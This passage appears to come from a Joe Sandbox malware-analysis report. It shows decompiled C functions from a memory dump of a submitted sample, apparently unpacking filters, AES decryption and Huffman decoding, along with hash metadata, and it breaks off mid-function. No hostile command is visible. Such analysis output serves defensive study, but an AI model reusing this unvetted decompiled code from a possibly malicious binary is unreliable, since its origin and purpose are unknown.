                				void* _t278;
                				void* _t279;
                				void* _t280;
                				void* _t281;
                				void* _t282;
                				signed int _t286;
                				intOrPtr _t287;
                				void* _t288;
                				signed char* _t289;
                				void* _t290;
                				signed int _t291;
                				signed int _t292;
                				char _t293;
                				intOrPtr* _t295;
                				signed char _t296;
                				signed int _t301;
                				signed int _t302;
                				intOrPtr _t304;
                				intOrPtr* _t306;
                				signed char* _t307;
                				signed int _t308;
                				signed int _t314;
                				signed int _t316;
                				signed int _t318;
                				signed int _t319;
                				signed char _t320;
                				intOrPtr _t321;
                				intOrPtr _t322;
                				unsigned int _t325;
                				signed int _t326;
                				signed int _t327;
                				signed int _t328;
                				void* _t331;
                				signed char _t332;
                				signed char* _t333;
                				signed char _t335;
                				signed int _t336;
                				signed int _t337;
                				void* _t338;
                				void* _t339;
                				void* _t340;
                				signed int _t343;
                				signed int _t344;
                				signed char* _t345;
                				signed int _t346;
                				signed int _t348;
                				intOrPtr _t350;
                				signed int _t351;
                				signed int _t354;
                				void* _t358;
                				signed int _t359;
                				signed char* _t360;
                				signed int _t361;
                				void* _t362;
                				void* _t363;
                
                				_t349 = __ecx;
                				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
                				if(_t188 == 0) {
                					L84:
                					_t189 =  *(_t349 + 0x14);
                					_t295 =  *_t349;
                					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
                					_t288 = _t189 - 4;
                					if(_t288 > 0x3fffc) {
                						L96:
                						return 0;
                					}
                					_t338 = 0;
                					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
                					 *((char*)(_t363 + 0x13)) = _t192;
                					if(_t288 == 0) {
                						L95:
                						return 1;
                					} else {
                						goto L86;
                					}
                					do {
                						L86:
                						_t321 =  *_t295;
                						_t295 = _t295 + 1;
                						_t339 = _t338 + 1;
                						_t350 = _t350 + 1;
                						if(_t321 == 0xe8 || _t321 == _t192) {
                							_t322 =  *_t295;
                							if(_t322 >= 0) {
                								if(_t322 - 0x1000000 < 0) {
                									 *_t295 = _t322 - _t350;
                								}
                							} else {
                								if(_t350 + _t322 >= 0) {
                									 *_t295 = _t322 + 0x1000000;
                								}
                							}
                							_t192 =  *((intOrPtr*)(_t363 + 0x13));
                							_t295 = _t295 + 4;
                							_t338 = _t339 + 4;
                							_t350 = _t350 + 4;
                						}
                					} while (_t338 < _t288);
                					goto L95;
                				}
                				_t197 = _t188 - 1;
                				if(_t197 == 0) {
                					goto L84;
                				}
                				_t198 = _t197 - 1;
                				if(_t198 == 0) {
                					_t289 =  *__ecx;
                					_t340 = __ecx[5] - 0x15;
                					if(_t340 > 0x3ffeb) {
                						goto L96;
                					}
                					_t325 = __ecx[7] >> 4;
                					 *(_t363 + 0x28) = _t325;
                					if(_t340 == 0) {
                						goto L95;
                					}
                					_t343 = (_t340 - 1 >> 4) + 1;
                					 *(_t363 + 0x38) = _t343;
                					do {
                						_t201 =  *_t289 & 0x1f;
                						if(_t201 < 0x10) {
                							goto L82;
                						}
                						_t202 =  *((intOrPtr*)(_t201 + 0x40e078));
                						if(_t202 == 0) {
                							goto L82;
                						}
                						_t344 =  *(_t363 + 0x28);
                						_t296 = 0;
                						_t326 = _t202 & 0x000000ff;
                						 *(_t363 + 0x30) = 0;
                						 *(_t363 + 0x40) = _t326;
                						_t358 = 0x12;
                						do {
                							if((_t326 & 1) != 0) {
                								_t168 = _t358 + 0x18; // 0x2a
                								if(E003DC985(_t289, _t168, 4) == 5) {
                									E003DC9D0(_t289, E003DC985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
                								}
                								_t326 =  *(_t363 + 0x3c);
                								_t296 =  *(_t363 + 0x2c);
                							}
                							_t296 = _t296 + 1;
                							_t358 = _t358 + 0x29;
                							 *(_t363 + 0x2c) = _t296;
                						} while (_t358 <= 0x64);
                						_t343 =  *(_t363 + 0x38);
                						_t325 =  *(_t363 + 0x28);
                						L82:
                						_t289 =  &(_t289[0x10]);
                						_t325 = _t325 + 1;
                						_t343 = _t343 - 1;
                						 *(_t363 + 0x28) = _t325;
                						 *(_t363 + 0x38) = _t343;
                					} while (_t343 != 0);
                					goto L95;
                				}
                				_t212 = _t198 - 1;
                				if(_t212 == 0) {
                					_t213 = __ecx[1];
                					_t345 = __ecx[5];
                					 *(_t363 + 0x18) = _t213;
                					_t290 = _t213 - 3;
                					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
                						goto L96;
                					} else {
                						_t215 = __ecx[2];
                						 *(_t363 + 0x20) = _t215;
                						if(_t215 > 2) {
                							goto L96;
                						}
                						_t216 =  *__ecx;
                						 *(_t363 + 0x14) = _t216;
                						_t359 = 3;
                						_t351 =  &(_t345[_t216]);
                						_t217 = 0;
                						 *(_t363 + 0x24) = _t351;
                						_t301 = _t351 - _t290;
                						 *(_t363 + 0x30) = 0;
                						 *(_t363 + 0x28) = _t301;
                						do {
                							_t291 = 0;
                							if(_t217 >= _t345) {
                								goto L65;
                							}
                							_t327 =  *(_t363 + 0x18);
                							_t360 =  &(_t217[_t301]);
                							_t302 =  *(_t363 + 0x14);
                							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
                							 *(_t363 + 0x34) = _t225;
                							do {
                								if( &(_t225[_t360]) >= _t327) {
                									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
                									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
                									 *(_t363 + 0x44) = E003F614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
                									 *(_t363 + 0x38) = E003F614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
                									_t237 = E003F614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
                									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
                									_t363 = _t363 + 0xc;
                									_t332 =  *(_t363 + 0x2c);
                									if(_t304 > _t332 || _t304 > _t237) {
                										_t302 =  *(_t363 + 0x14);
                										_t327 =  *(_t363 + 0x18);
                										_t291 =  *(_t363 + 0x3c);
                										if(_t332 > _t237) {
                											_t291 =  *(_t363 + 0x38);
                										}
                									} else {
                										_t302 =  *(_t363 + 0x14);
                										_t327 =  *(_t363 + 0x18);
                									}
                								}
                								_t228 = _t291 -  *_t302;
                								_t302 = _t302 + 1;
                								(_t360 - 3)[_t327] = _t228;
                								_t360 =  &(_t360[3]);
                								_t291 = _t228 & 0x000000ff;
                								 *(_t363 + 0x14) = _t302;
                								_t225 =  *(_t363 + 0x34);
                							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
                							_t217 =  *(_t363 + 0x30);
                							_t301 =  *(_t363 + 0x28);
                							_t351 =  *(_t363 + 0x24);
                							_t359 = 3;
                							L65:
                							_t217 =  &(_t217[1]);
                							 *(_t363 + 0x30) = _t217;
                						} while (_t217 < _t359);
                						_t328 =  *(_t363 + 0x20);
                						_t218 = _t345 - 2;
                						if(_t328 >= _t218) {
                							goto L95;
                						}
                						_t306 = _t328 + 2 + _t351;
                						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
                						do {
                							_t222 =  *((intOrPtr*)(_t306 - 1));
                							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
                							 *_t306 =  *_t306 + _t222;
                							_t306 = _t306 + _t359;
                							_t331 = _t331 - 1;
                						} while (_t331 != 0);
                						goto L95;
                					}
                				}
                				_t238 = _t212 - 1;
                				if(_t238 == 0) {
                					_t307 = __ecx[5];
                					_t333 =  *__ecx;
                					_t239 = __ecx[1];
                					 *(_t363 + 0x30) = _t333;
                					 *(_t363 + 0x34) = _t307;
                					 *(_t363 + 0x38) = _t239;
                					 *(_t363 + 0x40) =  &(_t333[_t307]);
                					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
                						goto L96;
                					} else {
                						_t346 = 0;
                						 *(_t363 + 0x3c) = 0;
                						if(_t239 == 0) {
                							goto L95;
                						} else {
                							goto L20;
                						}
                						do {
                							L20:
                							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
                							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
                							_t354 = 0;
                							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
                							_t292 = 0;
                							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
                							_t361 = 0;
                							 *(_t363 + 0x20) = 0;
                							E003EFFF0(_t346, _t363 + 0x44, 0, 0x1c);
                							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
                							_t363 = _t363 + 0xc;
                							 *(_t363 + 0x28) = _t346;
                							if(_t346 >=  *(_t363 + 0x34)) {
                								_t242 =  *(_t363 + 0x38);
                								goto L49;
                							} else {
                								goto L21;
                							}
                							do {
                								L21:
                								_t308 =  *(_t363 + 0x20);
                								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
                								_t245 =  *(_t363 + 0x30);
                								 *(_t363 + 0x1c) = _t308;
                								_t335 =  *_t245;
                								 *(_t363 + 0x30) =  &(_t245[1]);
                								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
                								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
                								_t357 = _t335 << 3;
                								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
                								 *(_t363 + 0x28) = _t314;
                								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E003F614A(_t335, _t335 << 3);
                								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E003F614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
                								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E003F614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
                								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E003F614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
                								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E003F614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
                								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E003F614A(_t335, _t357 -  *(_t363 + 0x18));
                								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E003F614A(_t335, _t357 +  *(_t363 + 0x18));
                								_t363 = _t363 + 0x1c;
                								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
                									_t354 =  *(_t363 + 0x14);
                								} else {
                									_t336 =  *(_t363 + 0x44);
                									_t277 = 0;
                									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
                									_t318 = 1;
                									do {
                										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
                											_t336 =  *(_t363 + 0x44 + _t318 * 4);
                											_t277 = _t318;
                										}
                										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
                										_t318 = _t318 + 1;
                									} while (_t318 < 7);
                									_t354 =  *(_t363 + 0x14);
                									_t278 = _t277 - 1;
                									if(_t278 == 0) {
                										if(_t292 >= 0xfffffff0) {
                											_t292 = _t292 - 1;
                										}
                										goto L46;
                									}
                									_t279 = _t278 - 1;
                									if(_t279 == 0) {
                										if(_t292 < 0x10) {
                											_t292 = _t292 + 1;
                										}
                										goto L46;
                									}
                									_t280 = _t279 - 1;
                									if(_t280 == 0) {
                										if(_t361 >= 0xfffffff0) {
                											_t361 = _t361 - 1;
                										}
                										goto L46;
                									}
                									_t281 = _t280 - 1;
                									if(_t281 == 0) {
                										if(_t361 < 0x10) {
                											_t361 = _t361 + 1;
                										}
                										goto L46;
                									}
                									_t282 = _t281 - 1;
                									if(_t282 == 0) {
                										if(_t354 < 0xfffffff0) {
                											goto L46;
                										}
                										_t354 = _t354 - 1;
                										L34:
                										 *(_t363 + 0x14) = _t354;
                										goto L46;
                									}
                									if(_t282 != 1 || _t354 >= 0x10) {
                										goto L46;
                									} else {
                										_t354 = _t354 + 1;
                										goto L34;
                									}
                								}
                								L46:
                								_t242 =  *(_t363 + 0x38);
                								_t316 =  *(_t363 + 0x28) + _t242;
                								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
                								 *(_t363 + 0x28) = _t316;
                							} while (_t316 <  *(_t363 + 0x34));
                							_t346 =  *(_t363 + 0x3c);
                							L49:
                							_t346 = _t346 + 1;
                							 *(_t363 + 0x3c) = _t346;
                						} while (_t346 < _t242);
                						goto L95;
                					}
                				}
                				if(_t238 != 1) {
                					goto L95;
                				}
                				_t319 = __ecx[5];
                				_t362 = 0;
                				_t337 = __ecx[1];
                				 *(_t363 + 0x28) = _t319;
                				 *(_t363 + 0x2c) = _t319 + _t319;
                				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
                					goto L96;
                				} else {
                					_t286 = _t337;
                					 *(_t363 + 0x24) = _t337;
                					do {
                						_t293 = 0;
                						_t348 = _t319;
                						if(_t319 <  *(_t363 + 0x2c)) {
                							_t320 =  *(_t363 + 0x2c);
                							goto L12;
                							L12:
                							_t287 =  *_t349;
                							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
                							_t362 = _t362 + 1;
                							 *((char*)(_t287 + _t348)) = _t293;
                							_t348 = _t348 + _t337;
                							if(_t348 < _t320) {
                								goto L12;
                							} else {
                								_t319 =  *(_t363 + 0x28);
                								_t286 =  *(_t363 + 0x24);
                								goto L14;
                							}
                						}
                						L14:
                						_t319 = _t319 + 1;
                						_t286 = _t286 - 1;
                						 *(_t363 + 0x28) = _t319;
                						 *(_t363 + 0x24) = _t286;
                					} while (_t286 != 0);
                					goto L95;
                				}
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a4da1aaa9dffbecec8c7afa99821a62cdddb31eb3a1eb96859761e3846912b16
                • Instruction ID: 7961bd9e7ae4da1e1b6d5e3d18daaaeea6ce9e3b2774f83031ad3c7818b4eef1
                • Opcode Fuzzy Hash: a4da1aaa9dffbecec8c7afa99821a62cdddb31eb3a1eb96859761e3846912b16
                • Instruction Fuzzy Hash: 0CF1BD726283028FC716CF28D494A2ABBE5EF8A314F256A2FF585D7391D730D945CB42
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DE9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
                				void* _t220;
                				intOrPtr _t227;
                				void* _t250;
                				signed char _t252;
                				signed int _t300;
                				signed int* _t303;
                				signed char _t346;
                				unsigned int _t348;
                				signed int _t351;
                				unsigned int _t354;
                				signed int* _t357;
                				signed int _t361;
                				signed int _t366;
                				signed int _t370;
                				signed int _t374;
                				signed char _t376;
                				signed int* _t380;
                				signed int _t387;
                				signed int _t392;
                				intOrPtr _t394;
                				signed char _t395;
                				signed char _t396;
                				signed char _t397;
                				unsigned int _t399;
                				signed int _t402;
                				unsigned int _t405;
                				unsigned int _t407;
                				unsigned int _t408;
                				signed int _t409;
                				signed int _t414;
                				unsigned int _t415;
                				unsigned int _t416;
                				signed int _t418;
                				signed int _t422;
                				signed int _t423;
                				intOrPtr _t425;
                				signed int _t426;
                				void* _t430;
                				void* _t431;
                
                				_t407 =  *(_t430 + 0x6c);
                				_t425 = __ecx;
                				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
                				if(_t407 != 0) {
                					_t408 = _t407 >> 4;
                					 *(_t430 + 0x6c) = _t408;
                					if( *((char*)(__ecx)) == 0) {
                						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
                						E003F0320(_t430 + 0x5c, __ecx + 8, 0x10);
                						_t431 = _t430 + 0xc;
                						if(_t408 == 0) {
                							L13:
                							return E003F0320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
                						}
                						_t392 =  *(_t431 + 0x68);
                						 *(_t431 + 0x24) = _t392 + 8;
                						_t227 =  *((intOrPtr*)(_t431 + 0x78));
                						_t394 = _t392 - _t227 - 8;
                						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
                						_t357 = _t227 + 8;
                						 *(_t431 + 0x28) = _t357;
                						do {
                							_t414 =  *(_t425 + 4);
                							 *(_t431 + 0x30) = _t357 + _t394;
                							E003DE985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
                							_t395 =  *(_t431 + 0x4c);
                							 *(_t431 + 0x10) =  *(0x4161c8 + (_t395 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
                							_t346 =  *(_t431 + 0x58);
                							_t361 =  *(_t431 + 0x10) ^  *(0x4165c8 + (_t346 & 0x000000ff) * 4);
                							 *(_t431 + 0x10) = _t361;
                							 *(_t431 + 0x3c) = _t361;
                							_t396 =  *(_t431 + 0x50);
                							_t366 =  *(0x4165c8 + (_t395 & 0x000000ff) * 4) ^  *(0x4161c8 + (_t396 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
                							 *(_t431 + 0x1c) = _t366;
                							 *(_t431 + 0x40) = _t366;
                							_t397 =  *(_t431 + 0x54);
                							 *(_t431 + 0x14) =  *(0x4169c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0x4165c8 + (_t396 & 0x000000ff) * 4);
                							_t370 =  *(_t431 + 0x14) ^  *(0x4161c8 + (_t397 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
                							 *(_t431 + 0x14) = _t370;
                							 *(_t431 + 0x44) = _t370;
                							 *(_t431 + 0x18) =  *(0x416dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
                							_t374 =  *(_t431 + 0x18) ^  *(0x4165c8 + (_t397 & 0x000000ff) * 4) ^  *(0x4161c8 + (_t346 & 0x000000ff) * 4);
                							_t250 = _t414 - 1;
                							 *(_t431 + 0x18) = _t374;
                							 *(_t431 + 0x48) = _t374;
                							if(_t250 <= 1) {
                								goto L9;
                							}
                							_t409 =  *(_t431 + 0x1c);
                							_t422 = (_t250 + 2 << 4) + _t425;
                							_t426 =  *(_t431 + 0x10);
                							 *(_t431 + 0x18) = _t422;
                							 *(_t431 + 0x20) = _t250 - 1;
                							do {
                								_t405 =  *_t422 ^  *(_t431 + 0x14);
                								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
                								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
                								_t354 =  *(_t422 - 4) ^ _t409;
                								_t423 =  *(_t431 + 0x1c);
                								_t426 =  *(0x4169c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4165c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x416dc8 + (_t354 >> 0x18) * 4) ^  *(0x4161c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
                								 *(_t431 + 0x3c) = _t426;
                								_t409 =  *(0x4169c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4165c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x416dc8 + (_t405 >> 0x18) * 4) ^  *(0x4161c8 + (_t354 & 0x000000ff) * 4);
                								 *(_t431 + 0x40) = _t409;
                								_t387 =  *(0x4165c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4169c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x416dc8 + (_t423 >> 0x18) * 4) ^  *(0x4161c8 + (_t405 & 0x000000ff) * 4);
                								 *(_t431 + 0x14) = _t387;
                								 *(_t431 + 0x44) = _t387;
                								_t422 =  *(_t431 + 0x18) - 0x10;
                								 *(_t431 + 0x18) = _t422;
                								_t374 =  *(0x4169c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4165c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x416dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0x4161c8 + (_t423 & 0x000000ff) * 4);
                								_t132 = _t431 + 0x20;
                								 *_t132 =  *(_t431 + 0x20) - 1;
                								 *(_t431 + 0x48) = _t374;
                							} while ( *_t132 != 0);
                							 *(_t431 + 0x1c) = _t409;
                							_t408 =  *(_t431 + 0x74);
                							 *(_t431 + 0x10) = _t426;
                							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
                							 *(_t431 + 0x18) = _t374;
                							L9:
                							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
                							 *(_t431 + 0x20) = _t252;
                							 *(_t431 + 0x4c) = _t252;
                							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
                							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0x4150c8));
                							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
                							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
                							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0x4150c8));
                							_t415 =  *(_t431 + 0x20);
                							 *(_t431 + 0x54) = _t399;
                							 *(_t431 + 0x50) = _t348;
                							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0x4150c8));
                							 *(_t431 + 0x58) = _t376;
                							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0x4150c8));
                							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0x4150c8));
                							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0x4150c8));
                							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0x4150c8));
                							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0x4150c8));
                							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0x4150c8));
                							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0x4150c8));
                							_t416 = _t415 >> 0x18;
                							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0x4150c8));
                							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0x4150c8));
                							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0x4150c8));
                							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
                							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0x4150c8));
                							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0x4150c8));
                							_t186 = _t416 + 0x4150c8; // 0x30d56a09
                							 *((char*)(_t431 + 0x4b)) =  *_t186;
                							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
                							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
                							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
                							 *(_t431 + 0x20) = _t300;
                							if( *((char*)(_t425 + 1)) != 0) {
                								_t402 = _t402 ^  *(_t431 + 0x5c);
                								_t418 = _t418 ^  *(_t431 + 0x60);
                								_t351 = _t351 ^  *(_t431 + 0x64);
                								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
                							}
                							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
                							_t303 =  *(_t431 + 0x24);
                							 *(_t431 + 0x60) =  *(_t303 - 4);
                							 *(_t431 + 0x64) =  *_t303;
                							 *(_t431 + 0x68) = _t303[1];
                							_t380 =  *(_t431 + 0x28);
                							 *(_t431 + 0x24) =  &(_t303[4]);
                							 *(_t380 - 8) = _t402;
                							_t380[1] =  *(_t431 + 0x20);
                							_t394 =  *((intOrPtr*)(_t431 + 0x34));
                							 *(_t380 - 4) = _t418;
                							 *_t380 = _t351;
                							_t357 =  &(_t380[4]);
                							_t408 = _t408 - 1;
                							 *(_t431 + 0x28) = _t357;
                							 *(_t431 + 0x74) = _t408;
                						} while (_t408 != 0);
                						goto L13;
                					}
                					return E003DEE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
                				}
                				return _t220;
                			}


                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7785a15e5689081a76bc763e5a564905f81c618bdaf6acc0837ec8dfb2c56276
                • Instruction ID: 71d063ddc30f8762997527fb2169d5f7ad6aef682b7fb85fc1eb5cf842ee5557
                • Opcode Fuzzy Hash: 7785a15e5689081a76bc763e5a564905f81c618bdaf6acc0837ec8dfb2c56276
                • Instruction Fuzzy Hash: E8E16D755083948FC304CF69D8904AABFF0AFDA310F46496EF9C497352C235EA19DB96
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E003E4088(void* __ecx, void* __edx) {
                				void* __edi;
                				signed int _t82;
                				signed int _t87;
                				signed int _t92;
                				signed int _t93;
                				signed int _t94;
                				signed int _t97;
                				signed int _t98;
                				void* _t99;
                				void* _t101;
                				void* _t121;
                				signed int _t130;
                				signed int _t139;
                				signed int _t140;
                				signed int _t149;
                				signed int _t151;
                				void* _t153;
                				signed int _t156;
                				signed int _t157;
                				intOrPtr* _t158;
                				intOrPtr* _t167;
                				signed int _t170;
                				void* _t171;
                				signed int _t174;
                				void* _t179;
                				unsigned int _t181;
                				void* _t184;
                				signed int _t185;
                				intOrPtr* _t186;
                				void* _t187;
                				signed int _t188;
                				signed int _t189;
                				intOrPtr* _t190;
                				signed int _t193;
                				signed int _t198;
                				void* _t201;
                
                				_t179 = __edx;
                				_t187 = __ecx;
                				_t186 = __ecx + 4;
                				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E003E4DC4(__ecx) != 0) {
                					E003DA881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
                					_t82 = E003DA898(_t186);
                					_t205 = _t82 & 0x00008000;
                					if((_t82 & 0x00008000) == 0) {
                						_t139 = 0;
                						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
                						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
                						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
                						__eflags = _t82 & 0x00004000;
                						if((_t82 & 0x00004000) == 0) {
                							E003EFFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
                							_t201 = _t201 + 0xc;
                						}
                						E003DA881(_t186, 2);
                						do {
                							 *(_t201 + 0x14) = E003DA898(_t186) >> 0xc;
                							E003DA881(_t186, 4);
                							_t87 =  *(_t201 + 0x10);
                							__eflags = _t87 - 0xf;
                							if(_t87 != 0xf) {
                								 *(_t201 + _t139 + 0x14) = _t87;
                								goto L15;
                							}
                							_t188 = E003DA898(_t186) >> 0x0000000c & 0x000000ff;
                							E003DA881(_t186, 4);
                							__eflags = _t188;
                							if(_t188 != 0) {
                								_t189 = _t188 + 2;
                								__eflags = _t189;
                								while(1) {
                									_t189 = _t189 - 1;
                									__eflags = _t139 - 0x14;
                									if(_t139 >= 0x14) {
                										break;
                									}
                									 *(_t201 + _t139 + 0x14) = 0;
                									_t139 = _t139 + 1;
                									__eflags = _t189;
                									if(_t189 != 0) {
                										continue;
